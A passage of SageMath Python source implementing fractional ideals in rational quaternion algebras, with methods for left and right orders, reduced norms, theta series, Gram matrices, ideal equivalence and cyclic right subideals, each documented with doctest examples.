- ``basis`` -- tuple of length 4 of elements of the ambient
quaternion algebra whose `\\ZZ`-span is an ideal
- ``check`` -- bool (default: ``True``); if ``False``, do no type
checking, and the input basis *must* be in Hermite form.
"""
def __init__(self, basis, left_order=None, right_order=None, check=True):
"""
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.right_ideal(R.basis())
Fractional ideal (1/2 + 1/2*i, i, 1/2*j + 1/2*k, k)
sage: R.right_ideal(tuple(R.basis()), check=False)
Fractional ideal (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
if check:
if left_order is not None and not isinstance(left_order, QuaternionOrder):
raise TypeError("left_order must be a quaternion order or None")
if right_order is not None and not isinstance(right_order, QuaternionOrder):
raise TypeError("right_order must be a quaternion order or None")
if not isinstance(basis, (list, tuple)):
raise TypeError("basis must be a list or tuple")
self.__left_order = left_order
self.__right_order = right_order
if check:
try:
Q = self.quaternion_order().quaternion_algebra()
except RuntimeError:
Q = basis[0].parent()
basis = tuple([Q(v) for v in
(QQ**4).span([Q(v).coefficient_tuple() for v in basis], ZZ).basis()])
self.__basis = basis
def scale(self, alpha, left=False):
r"""
Scale the fractional ideal ``self`` by multiplying the basis
by ``alpha``.
INPUT:
- `\alpha` -- element of quaternion algebra
- ``left`` -- bool (default: False); if true multiply
`\alpha` on the left, otherwise multiply `\alpha` on the right
OUTPUT:
- a new fractional ideal
EXAMPLES::
sage: B = BrandtModule(5,37); I = B.right_ideals()[0]; i,j,k = B.quaternion_algebra().gens(); I
Fractional ideal (2 + 2*j + 106*k, i + 2*j + 105*k, 4*j + 64*k, 148*k)
sage: I.scale(i)
Fractional ideal [2*i + 212*j - 2*k, -2 + 210*j - 2*k, 128*j - 4*k, 296*j]
sage: I.scale(i, left=True)
Fractional ideal [2*i - 212*j + 2*k, -2 - 210*j + 2*k, -128*j + 4*k, -296*j]
sage: I.scale(i, left=False)
Fractional ideal [2*i + 212*j - 2*k, -2 + 210*j - 2*k, 128*j - 4*k, 296*j]
sage: i * I.gens()[0]
2*i - 212*j + 2*k
sage: I.gens()[0] * i
2*i + 212*j - 2*k
"""
Q = self.quaternion_algebra()
alpha = Q(alpha)
if left:
gens = [alpha*b for b in self.basis()]
else:
gens = [b*alpha for b in self.basis()]
return Q.ideal(gens, left_order = self.__left_order,
right_order = self.__right_order, check=False)
def quaternion_algebra(self):
"""
Return the ambient quaternion algebra that contains this fractional ideal.
OUTPUT: a quaternion algebra
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.quaternion_algebra()
Quaternion Algebra (-1, -3) with base ring Rational Field
"""
try: return self.__quaternion_algebra
except AttributeError: pass
A = self.__basis[0].parent()
self.__quaternion_algebra = A
return A
def _compute_order(self, side='left'):
r"""
Used internally to compute either the left or right order
associated to an ideal in a quaternion algebra. To compute the
left order, the basis elements are made to act by multiplication
on the right (``action='right'``); for the right order they act
on the left.
INPUT:
- ``side`` -- 'left' or 'right'
EXAMPLES::
sage: R.<i,j,k> = QuaternionAlgebra(-1,-11)
sage: I = R.ideal([2 + 2*j + 140*k, 2*i + 4*j + 150*k, 8*j + 104*k, 152*k])
sage: Ol = I._compute_order('left'); Ol
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j + 35*k, 1/4*i + 1/2*j + 75/4*k, j + 32*k, 38*k)
sage: Or = I._compute_order('right'); Or
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j + 16*k, 1/2*i + 11/2*k, j + 13*k, 19*k)
sage: Ol.discriminant()
209
sage: Or.discriminant()
209
sage: I.left_order() == Ol
True
sage: I.right_order() == Or
True
ALGORITHM: Let `b_1, b_2, b_3, b_3` be a basis for this
fractional ideal `I`, and assume we want to compute the left
order of `I` in the quaternion algebra `Q`. Then
multiplication by `b_i` on the right defines a map `B_i:Q \to
Q`. We have
.. MATH::
R = B_1^{-1}(I) \cap B_2^{-1}(I) \cap B_3^{-1}(I)\cap B_4^{-1}(I).
This is because
.. MATH::
B_n^{-1}(I) = \{\alpha \in Q : \alpha b_n \in I \},
and
.. MATH::
R = \{\alpha \in Q : \alpha b_n \in I, n=1,2,3,4\}.
"""
if side == 'left':
action = 'right'
elif side == 'right':
action = 'left'
else:
raise ValueError("side must be 'left' or 'right'")
Q = self.quaternion_algebra()
if Q.base_ring() != QQ:
raise NotImplementedError("computation of left and right orders only implemented over QQ")
M = [(~b).matrix(action=action) for b in self.basis()]
B = self.basis_matrix()
invs = [B*m for m in M]
# Now intersect the row spans of each matrix in invs
ISB = [Q(v) for v in intersection_of_row_modules_over_ZZ(invs).row_module(ZZ).basis()]
return Q.quaternion_order(ISB)
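# Editor's sketch (not in the original source): by the ALGORITHM block above,
# every element of the left order maps the ideal into itself under left
# multiplication, which can be spot-checked via ``__contains__``:
#
#     R = QuaternionAlgebra(-1, -11)
#     i, j, k = R.gens()
#     I = R.ideal([2 + 2*j + 140*k, 2*i + 4*j + 150*k, 8*j + 104*k, 152*k])
#     Ol = I.left_order()
#     assert all(a*b in I for a in Ol.basis() for b in I.basis())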
def left_order(self):
"""
Return the left order associated to this fractional ideal.
OUTPUT: an order in a quaternion algebra
EXAMPLES::
sage: B = BrandtModule(11)
sage: R = B.maximal_order()
sage: I = R.unit_ideal()
sage: I.left_order()
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
We do a consistency check::
sage: B = BrandtModule(11,19); R = B.right_ideals()
sage: [r.left_order().discriminant() for r in R]
[209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209]
"""
if self.__left_order is None:
self.__left_order = self._compute_order(side='left')
return self.__left_order
def right_order(self):
"""
Return the right order associated to this fractional ideal.
OUTPUT: an order in a quaternion algebra
EXAMPLES::
sage: I = BrandtModule(389).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 2*k, i + 2*j + k, 8*j, 8*k)
sage: I.right_order()
Order of Quaternion Algebra (-2, -389) with base ring Rational Field with basis (1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
sage: I.left_order()
Order of Quaternion Algebra (-2, -389) with base ring Rational Field with basis (1/2 + 1/2*j + 3/2*k, 1/8*i + 1/4*j + 9/8*k, j + k, 2*k)
The following is a big consistency check. We take reps for
all the right ideal classes of a certain order, take the
corresponding left orders, then take ideals in the left orders
and from those compute the right order again::
sage: B = BrandtModule(11,19); R = B.right_ideals()
sage: O = [r.left_order() for r in R]
sage: J = [O[i].left_ideal(R[i].basis()) for i in range(len(R))]
sage: len(set(J))
18
sage: len(set([I.right_order() for I in J]))
1
sage: J[0].right_order() == B.order_of_level_N()
True
"""
if self.__right_order is None:
self.__right_order = self._compute_order(side='right')
return self.__right_order
def __repr__(self):
"""
Return string representation of this quaternion fractional ideal.
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]
sage: type(I)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionFractionalIdeal_rational'>
sage: I.__repr__()
'Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 2*k, 8*j, 8*k)'
"""
return 'Fractional ideal %s'%(self.gens(),)
def quaternion_order(self):
"""
Return the order for which this ideal is a left or right
fractional ideal. If this ideal has both a left and right
ideal structure, then the left order is returned. If it has
neither structure, then an error is raised.
OUTPUT: QuaternionOrder
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.unit_ideal().quaternion_order() is R
True
"""
try: return self.__quaternion_order
except AttributeError: pass
if self.__left_order is not None:
A = self.__left_order
elif self.__right_order is not None:
A = self.__right_order
else:
raise RuntimeError("unable to determine quaternion order of ideal without known order")
self.__quaternion_order = A
return A
def ring(self):
"""
Return the ring that this is a fractional ideal for.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.unit_ideal().ring() is R
True
"""
return self.quaternion_order()
def basis(self):
"""
Return basis for this fractional ideal. The basis is in Hermite form.
OUTPUT: tuple
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def gens(self):
"""
Return the generators for this ideal, which are the same as
the `\\ZZ`-basis for this ideal.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().gens()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def __cmp__(self, right):
"""
Compare this fractional quaternion ideal to ``right``. If
``right`` is not a fractional quaternion ideal a TypeError is
raised. If the fractional ideals are in different ambient
quaternion algebras, then the quaternion algebras themselves
are compared.
INPUT:
- ``right`` - another fractional quaternion ideal
EXAMPLES::
sage: I = QuaternionAlgebra(-11,-1).maximal_order().unit_ideal()
sage: I == I # indirect doctest
True
sage: I == 5
False
"""
if not isinstance(right, QuaternionFractionalIdeal_rational):
raise TypeError
return cmp(self.__basis, right.__basis)
def basis_matrix(self):
r"""
Return basis matrix `M` in Hermite normal form for self as a
matrix with rational entries.
If `Q` is the ambient quaternion algebra, then the `\ZZ`-span of
the rows of `M` viewed as linear combinations of Q.basis() =
`[1,i,j,k]` is the fractional ideal self. Also,
``M * M.denominator()`` is an integer matrix in Hermite normal form.
OUTPUT: matrix over `\QQ`
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis_matrix()
[ 1/2 1/2 0 0]
[ 0 0 1/2 -1/2]
[ 0 1 0 0]
[ 0 0 0 -1]
"""
try: return self.__hermite_basis_matrix
except AttributeError: pass
B = quaternion_algebra_cython.rational_matrix_from_rational_quaternions(self.__basis)
self.__hermite_basis_matrix = B
return B
def free_module(self):
r"""
Return the free module associated to this quaternionic
fractional ideal, viewed as a submodule of
``Q.free_module()``, where ``Q`` is the ambient quaternion
algebra.
OUTPUT:
Free `\ZZ`-module of rank 4 embedded in an ambient `\QQ^4`.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis_matrix()
[ 1/2 1/2 0 0]
[ 0 0 1/2 -1/2]
[ 0 1 0 0]
[ 0 0 0 -1]
This shows that the issue at :trac:`6760` is fixed::
sage: R.<i,j,k> = QuaternionAlgebra(-1, -13)
sage: I = R.ideal([2+i, 3*i, 5*j, j+k]); I
Fractional ideal (2 + i, 3*i, j + k, 5*k)
sage: I.free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[2 1 0 0]
[0 3 0 0]
[0 0 1 1]
[0 0 0 5]
"""
try: return self.__free_module
except AttributeError:
M = self.basis_matrix().row_module(ZZ)
self.__free_module = M
return M
def theta_series_vector(self, B):
r"""
Return theta series coefficients of ``self``, as a vector
of ``B`` integers.
INPUT:
- ``B`` -- positive integer
OUTPUT:
Vector over `\ZZ` with ``B`` entries.
EXAMPLES::
sage: I = BrandtModule(37).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 2*k, i + 2*j + k, 8*j, 8*k)
sage: I.theta_series_vector(5)
(1, 0, 2, 2, 6)
sage: I.theta_series_vector(10)
(1, 0, 2, 2, 6, 4, 8, 6, 10, 10)
sage: I.theta_series_vector(5)
(1, 0, 2, 2, 6)
"""
B = Integer(B)
try:
if len(self.__theta_series_vector) >= B: return self.__theta_series_vector[:B]
except AttributeError: pass
V = FreeModule(ZZ, B)
Q = self.quadratic_form()
v = V(Q.representation_number_list(B))
self.__theta_series_vector = v
return v
def quadratic_form(self):
"""
Return the normalized quadratic form associated to this quaternion ideal.
OUTPUT: quadratic form
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]
sage: Q = I.quadratic_form(); Q
Quadratic form in 4 variables over Rational Field with coefficients:
[ 18 22 33 22 ]
[ * 7 22 11 ]
[ * * 22 0 ]
[ * * * 22 ]
sage: Q.theta_series(10)
1 + 12*q^2 + 12*q^3 + 12*q^4 + 12*q^5 + 24*q^6 + 24*q^7 + 36*q^8 + 36*q^9 + O(q^10)
sage: I.theta_series(10)
1 + 12*q^2 + 12*q^3 + 12*q^4 + 12*q^5 + 24*q^6 + 24*q^7 + 36*q^8 + 36*q^9 + O(q^10)
"""
try: return self.__quadratic_form
except AttributeError: pass
from sage.quadratic_forms.quadratic_form import QuadraticForm
# first get the gram matrix
gram_matrix = self.gram_matrix()
# rescale so that there are no denominators
gram_matrix, _ = gram_matrix._clear_denom()
# Make sure gcd of all entries is 1.
g = gram_matrix.gcd()
if g != 1:
gram_matrix = gram_matrix / g
# now get the quadratic form
Q = QuadraticForm(gram_matrix)
self.__quadratic_form = Q
return Q
def theta_series(self, B, var='q'):
r"""
Return normalized theta series of self, as a power series over
`\ZZ` in the variable ``var``, which is 'q' by default.
The normalized theta series is by definition
.. MATH::
\theta_I(q) = \sum_{x \in I} q^{\frac{N(x)}{N(I)}}.
INPUT:
- ``B`` -- positive integer
- ``var`` -- string (default: 'q')
OUTPUT: power series
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 2*k, 8*j, 8*k)
sage: I.norm()
32
sage: I.theta_series(5)
1 + 12*q^2 + 12*q^3 + 12*q^4 + O(q^5)
sage: I.theta_series(5,'T')
1 + 12*T^2 + 12*T^3 + 12*T^4 + O(T^5)
sage: I.theta_series(3)
1 + 12*q^2 + O(q^3)
"""
try:
if self.__theta_series.prec() >= B:
if var == self.__theta_series.variable():
return self.__theta_series.add_bigoh(B)
else:
return ZZ[[var]](self.__theta_series.list()[:B+1])
except AttributeError: pass
v = self.theta_series_vector(B)
theta = ZZ[[var]](v.list()).add_bigoh(B)
self.__theta_series = theta
return theta
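# Editor's sketch (not in the original source): the coefficients of the
# normalized theta series are exactly the representation numbers of the
# normalized quadratic form, which is how theta_series_vector computes them
# (``BrandtModule`` is a Sage global, not defined in this file):
#
#     I = BrandtModule(11).right_ideals()[1]
#     v = I.theta_series_vector(10)
#     assert list(v) == I.quadratic_form().representation_number_list(10)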
def gram_matrix(self):
r"""
Return the Gram matrix of this fractional ideal.
OUTPUT: `4 \times 4` matrix over `\QQ`.
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.gram_matrix()
[ 640 1920 2112 1920]
[ 1920 14080 13440 16320]
[ 2112 13440 13056 15360]
[ 1920 16320 15360 19200]
"""
try: return self.__gram_matrix
except AttributeError: pass
M = []
A = self.__basis
B = [z.conjugate() for z in self.__basis]
two = QQ(2)
m = [two*(a*b).reduced_trace() for b in B for a in A]
M44 = MatrixSpace(QQ, 4)
G = M44(m,coerce=False)
self.__gram_matrix = G
return G
def norm(self):
"""
Return the reduced norm of this fractional ideal.
OUTPUT: rational number
EXAMPLES::
sage: M = BrandtModule(37)
sage: C = M.right_ideals()
sage: [I.norm() for I in C]
[16, 32, 32]
sage: (a,b) = M.quaternion_algebra().invariants() # optional - magma
sage: magma.eval('A<i,j,k> := QuaternionAlgebra<Rationals() | %s, %s>' % (a,b)) # optional - magma
''
sage: magma.eval('O := QuaternionOrder(%s)' % str(list(C[0].right_order().basis()))) # optional - magma
''
sage: [ magma('rideal<O | %s>' % str(list(I.basis()))).Norm() for I in C] # optional - magma
[16, 32, 32]
sage: A.<i,j,k> = QuaternionAlgebra(-1,-1)
sage: R = A.ideal([i,j,k,1/2 + 1/2*i + 1/2*j + 1/2*k]) # this is actually an order, so has reduced norm 1
sage: R.norm()
1
sage: [ J.norm() for J in R.cyclic_right_subideals(3) ] # enumerate maximal right R-ideals of reduced norm 3, verify their norms
[3, 3, 3, 3]
"""
G = self.gram_matrix() / QQ(2)
r = G.det().abs()
assert r.is_square(), "first is bad!"
r = r.sqrt()
# If we know either the left- or the right order, use that one to compute the norm.
# Otherwise quaternion_order() will raise a RuntimeError and we compute the left order
try:
R = self.quaternion_order()
except RuntimeError:
R = self.left_order()
r /= R.discriminant()
assert r.is_square(), "second is bad!"
return r.sqrt()
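# Editor's sketch (not in the original source): unwinding the computation
# above gives det(gram_matrix()/2) = (N(I)^2 * disc(R))^2, where R is the
# order used in the division step (the left and right orders of an ideal
# share the same discriminant), so the norm can be cross-checked directly:
#
#     I = BrandtModule(37).right_ideals()[0]
#     G = I.gram_matrix() / 2
#     R = I.left_order()
#     assert G.det() == (I.norm()**2 * R.discriminant())**2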
def conjugate(self):
"""
Return the ideal with generators the conjugates of the generators for self.
OUTPUT: a quaternionic fractional ideal
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.conjugate()
Fractional ideal (2 + 2*j + 28*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
"""
return self.quaternion_algebra().ideal([b.conjugate() for b in self.basis()],
left_order=self.__right_order,
right_order=self.__left_order)
def __mul__(self, right):
"""
Return the product of the fractional ideals ``self`` and ``right``.
.. note::
We do not keep track of left or right order structure.
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I*I
Fractional ideal (8 + 24*j + 16*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
sage: I*I.conjugate()
Fractional ideal (16 + 16*j + 224*k, 8*i + 16*j + 136*k, 32*j + 128*k, 320*k)
sage: I.multiply_by_conjugate(I)
Fractional ideal (16 + 16*j + 224*k, 8*i + 16*j + 136*k, 32*j + 128*k, 320*k)
"""
if not isinstance(right, QuaternionFractionalIdeal_rational):
return self.scale(right, left=False)
gens = [a*b for a in self.basis() for b in right.basis()]
#if self.__right_order == right.__left_order:
# left_order = self.__left_order
# right_order = right.__right_order
basis = tuple(basis_for_quaternion_lattice(gens))
A = self.quaternion_algebra()
return A.ideal(basis, check=False)
@cached_method
def free_module(self):
r"""
Return the underlying free `\ZZ`-module corresponding to this ideal.
EXAMPLES::
sage: X = BrandtModule(3,5).right_ideals()
sage: X[0]
Fractional ideal (2 + 2*j + 8*k, 2*i + 18*k, 4*j + 16*k, 20*k)
sage: X[0].free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[ 2 0 2 8]
[ 0 2 0 18]
[ 0 0 4 16]
[ 0 0 0 20]
sage: X[0].scale(1/7).free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[ 2/7 0 2/7 8/7]
[ 0 2/7 0 18/7]
[ 0 0 4/7 16/7]
[ 0 0 0 20/7]
The free module method is also useful since it allows for checking if
one ideal is contained in another, computing quotients `I/J`, etc.::
sage: X = BrandtModule(3,17).right_ideals()
sage: I = X[0].intersection(X[2]); I
Fractional ideal (2 + 2*j + 164*k, 2*i + 4*j + 46*k, 16*j + 224*k, 272*k)
sage: I.free_module().is_submodule(X[3].free_module())
False
sage: I.free_module().is_submodule(X[1].free_module())
True
sage: X[0].free_module() / I.free_module()
Finitely generated module V/W over Integer Ring with invariants (4, 4)
"""
return self.basis_matrix().row_module(ZZ)
def intersection(self, J):
"""
Return the intersection of the ideals self and `J`.
EXAMPLES::
sage: X = BrandtModule(3,5).right_ideals()
sage: I = X[0].intersection(X[1]); I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
"""
V = self.free_module().intersection(J.free_module())
H,d = V.basis_matrix()._clear_denom()
A = self.quaternion_algebra()
gens = quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(A, H, d)
return A.ideal(gens)
def multiply_by_conjugate(self, J):
"""
Return product of self and the conjugate Jbar of `J`.
INPUT:
- ``J`` -- a quaternion ideal.
OUTPUT: a quaternionic fractional ideal.
EXAMPLES::
sage: R = BrandtModule(3,5).right_ideals()
sage: R[0].multiply_by_conjugate(R[1])
Fractional ideal (8 + 8*j + 112*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
sage: R[0]*R[1].conjugate()
Fractional ideal (8 + 8*j + 112*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
"""
Jbar = [b.conjugate() for b in J.basis()]
gens = [a*b for a in self.basis() for b in Jbar]
basis = tuple(basis_for_quaternion_lattice(gens))
R = self.quaternion_algebra()
return R.ideal(basis, check=False)
def is_equivalent(I, J, B=10):
"""
Return ``True`` if ``I`` and ``J`` are equivalent as right ideals.
INPUT:
- ``I`` -- a fractional quaternion ideal (self)
- ``J`` -- a fractional quaternion ideal with same order as ``I``
- ``B`` -- a bound to compute and compare theta series before
doing the full equivalence test
OUTPUT: bool
EXAMPLES::
sage: R = BrandtModule(3,5).right_ideals(); len(R)
2
sage: R[0].is_equivalent(R[1])
False
sage: R[0].is_equivalent(R[0])
True
sage: OO = R[0].quaternion_order()
sage: S = OO.right_ideal([3*a for a in R[0].basis()])
sage: R[0].is_equivalent(S)
True
"""
if not isinstance(J, QuaternionFractionalIdeal_rational):
return False
if I.right_order() != J.right_order():
raise ValueError("I and J must be right ideals")
# Just test theta series first. If the theta series are
# different, the ideals are definitely not equivalent.
if B > 0 and I.theta_series_vector(B) != J.theta_series_vector(B):
return False
# The theta series are the same, so perhaps the ideals are
# equivalent. We use Prop 1.18 of [Pizer, 1980] to decide.
# 1. Compute I * Jbar
# see Prop. 1.17 in Pizer. Note that we use IJbar instead of
# JbarI since we work with right ideals
IJbar = I.multiply_by_conjugate(J)
# 2. Determine if there is alpha in K such
# that N(alpha) = N(I)*N(J) as explained by Pizer.
c = IJbar.theta_series_vector(2)[1]
return c != 0
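# Editor's sketch (not in the original source): equivalence is invariant
# under rescaling, since scaling changes neither the right order nor the
# normalized theta series (cf. the doctest above with 3 times the basis):
#
#     R = BrandtModule(3, 5).right_ideals()
#     assert R[0].is_equivalent(R[0].scale(3))
#     assert not R[0].is_equivalent(R[1])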
def __contains__(self, x):
"""
Return whether ``x`` is in ``self``.
EXAMPLES::
sage: R.<i,j,k> = QuaternionAlgebra(-3, -13)
sage: I = R.ideal([2+i, 3*i, 5*j, j+k])
sage: 2+i in I
True
sage: 2+i+j+k in I
True
sage: 1+i in I
False
sage: 101*j + k in I
True
"""
try:
x = self.quaternion_algebra()(x)
return self.basis_matrix().transpose().solve_right(vector(x)) in ZZ**4
except (ValueError, TypeError):
return False
@cached_method
def cyclic_right_subideals(self, p, alpha=None):
r"""
Let `I` = ``self``. This function returns the right subideals
`J` of `I` such that `I/J` is an `\GF{p}`-vector space of
dimension 2.
INPUT:
- ``p`` -- prime number (see below)
- ``alpha`` -- (default: ``None``) element of quaternion algebra,
which can be used to parameterize the order of the
ideals `J`. More precisely the `J`'s are the right annihilators
of `(1,0) \alpha^i` for `i=0,1,2,...,p`
OUTPUT:
- list of right ideals
.. NOTE::
Currently, `p` must satisfy a bunch of conditions, or a
``NotImplementedError`` is raised. In particular, `p` must be
odd and unramified in the quaternion algebra, must be
coprime to the index of the right order in the maximal
order, and also coprime to the norm of ``self``. (The Brandt
modules code has a more general algorithm in some cases.)
EXAMPLES::
sage: B = BrandtModule(2,37); I = B.right_ideals()[0]
sage: I.cyclic_right_subideals(3)
[Fractional ideal (2 + 2*i + 10*j + 90*k, 4*i + 4*j + 152*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 2*j + 150*k, 4*i + 8*j + 196*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 6*j + 194*k, 4*i + 8*j + 344*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 6*j + 46*k, 4*i + 4*j + 4*k, 12*j + 132*k, 444*k)]
sage: B = BrandtModule(5,389); I = B.right_ideals()[0]
sage: C = I.cyclic_right_subideals(3); C
[Fractional ideal (2 + 10*j + 546*k, i + 6*j + 133*k, 12*j + 3456*k, 4668*k), Fractional ideal (2 + 2*j + 2910*k, i + 6*j + 3245*k, 12*j + 3456*k, 4668*k), Fractional ideal (2 + i + 2295*k, 3*i + 2*j + 3571*k, 4*j + 2708*k, 4668*k), Fractional ideal (2 + 2*i + 2*j + 4388*k, 3*i + 2*j + 2015*k, 4*j + 4264*k, 4668*k)]
sage: [(I.free_module()/J.free_module()).invariants() for J in C]
[(3, 3), (3, 3), (3, 3), (3, 3)]
sage: I.scale(3).cyclic_right_subideals(3)
[Fractional ideal (6 + 30*j + 1638*k, 3*i + 18*j + 399*k, 36*j + 10368*k, 14004*k), Fractional ideal (6 + 6*j + 8730*k, 3*i + 18*j + 9735*k, 36*j + 10368*k, 14004*k), Fractional ideal (6 + 3*i + 6885*k, 9*i + 6*j + 10713*k, 12*j + 8124*k, 14004*k), Fractional ideal (6 + 6*i + 6*j + 13164*k, 9*i + 6*j + 6045*k, 12*j + 12792*k, 14004*k)]
sage: C = I.scale(1/9).cyclic_right_subideals(3); C
[Fractional ideal (2/9 + 10/9*j + 182/3*k, 1/9*i + 2/3*j + 133/9*k, 4/3*j + 384*k, 1556/3*k), Fractional ideal (2/9 + 2/9*j + 970/3*k, 1/9*i + 2/3*j + 3245/9*k, 4/3*j + 384*k, 1556/3*k), Fractional ideal (2/9 + 1/9*i + 255*k, 1/3*i + 2/9*j + 3571/9*k, 4/9*j + 2708/9*k, 1556/3*k), Fractional ideal (2/9 + 2/9*i + 2/9*j + 4388/9*k, 1/3*i + 2/9*j + 2015/9*k, 4/9*j + 4264/9*k, 1556/3*k)]
sage: [(I.scale(1/9).free_module()/J.free_module()).invariants() for J in C]
[(3, 3), (3, 3), (3, 3), (3, 3)]
sage: Q.<i,j,k> = QuaternionAlgebra(-2,-5)
sage: I = Q.ideal([Q(1),i,j,k])
sage: I.cyclic_right_subideals(3)
[Fractional ideal (1 + 2*j, i + k, 3*j, 3*k), Fractional ideal (1 + j, i + 2*k, 3*j, 3*k), Fractional ideal (1 + 2*i, 3*i, j + 2*k, 3*k), Fractional ideal (1 + i, 3*i, j + k, 3*k)]
The general algorithm is not yet implemented here::
sage: I.cyclic_right_subideals(3)[0].cyclic_right_subideals(3)
Traceback (most recent call last):
...
NotImplementedError: general algorithm not implemented (The given basis vectors must be linearly independent.)
"""
R = self.right_order()
Q = self.quaternion_algebra()
f = Q.modp_splitting_map(p)
if alpha is not None:
alpha = f(alpha)
W = GF(p)**4
try:
A = W.span_of_basis([W(f(a).list()) for a in self.basis()])
scale = 1
IB = self.basis_matrix()
except (ValueError, ZeroDivisionError):
# try rescaling the ideal.
B, d = self.basis_matrix()._clear_denom()
g = gcd(B.list())
IB = B/g
scale = g/d
try:
A = W.span_of_basis([W(f(Q(a.list())).list()) for a in IB.rows()])
except (ValueError, ZeroDivisionError) as msg:
# Here we could replace the ideal by an *equivalent*
# ideal that works. This is always possible.
# However, I haven't implemented that algorithm yet.
raise NotImplementedError("general algorithm not implemented (%s)"%msg)
Ai = A.basis_matrix()**(-1)
AiB = Ai.change_ring(QQ) * IB
# Do not care about the denominator since we're really working in I/p*I.
AiB, _ = AiB._clear_denom()
pB = p*IB
pB, d = pB._clear_denom()
ans = []
Z = matrix(ZZ,2,4)
P1 = P1List(p)
if alpha is None:
lines = P1
else:
x = alpha
lines = []
for i in range(p+1):
lines.append(P1.normalize(x[0,0], x[0,1]))
x *= alpha
for u,v in lines:
# The following does:
# z = matrix(QQ,2,4,[0,-v,0,u, -v,0,u,0],check=False) * AiB
Z[0,1]=-v; Z[0,3]=u; Z[1,0]=-v; Z[1,2]=u
z = Z * AiB
# Now construct submodule of the ideal I spanned by the
# linear combinations given by z of the basis for J along
# with p*I.
G = (d*z).stack(pB) # have to multiply by d since we divide by it below in the "gens = " line.
H = G._hnf_pari(0, include_zero_rows=False)
gens = tuple(quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(Q, H, d))
if scale != 1:
gens = tuple([scale*g for g in gens])
J = R.right_ideal(gens, check=False)
ans.append(J)
return ans
#######################################################################
# Some utility functions that are needed here and are too
# specialized to go elsewhere.
#######################################################################
def basis_for_quaternion_lattice(gens, reverse = False):
r"""
Return a basis for the `\ZZ`-lattice in a quaternion algebra
spanned by the given gens.
INPUT:
- ``gens`` -- list of elements of a single quaternion algebra
- ``reverse`` -- when computing the HNF do it on the basis
`(k,j,i,1)` instead of `(1,i,j,k)`; this ensures
that if ``gens`` are the generators for an order,
the first returned basis vector is 1
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import basis_for_quaternion_lattice
sage: A.<i,j,k> = QuaternionAlgebra(-1,-7)
sage: basis_for_quaternion_lattice([i+j, i-j, 2*k, A(1/3)])
[1/3, i + j, 2*j, 2*k]
sage: basis_for_quaternion_lattice([A(1),i,j,k])
[1, i, j, k]
"""
if len(gens) == 0: return []
Z, d = quaternion_algebra_cython.integral_matrix_and_denom_from_rational_quaternions(gens, reverse)
H = Z._hnf_pari(0, include_zero_rows=False)
A = gens[0].parent()
return quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(A, H, d, reverse)
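# Editor's note -- an illustrative check, not in the original source; the
# helper name is hypothetical and it assumes a Sage session where this
# module's globals are available. With ``reverse=True`` the HNF is taken on
# the basis (k,j,i,1), so generators of an order yield 1 as first vector.
def _demo_basis_for_quaternion_lattice():
    A = QuaternionAlgebra(-1, -7)
    i, j, k = A.gens()
    basis = basis_for_quaternion_lattice([A(1), i, j, k], reverse=True)
    assert basis[0] == 1   # documented property of reverse=True
    return basis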
def intersection_of_row_modules_over_ZZ(v):
r"""
Intersects the `\ZZ`-modules with basis matrices the full rank `4 \times 4`
`\QQ`-matrices in the list v. The returned intersection is
represented by a `4 \times 4` matrix over `\QQ`. This can also be done
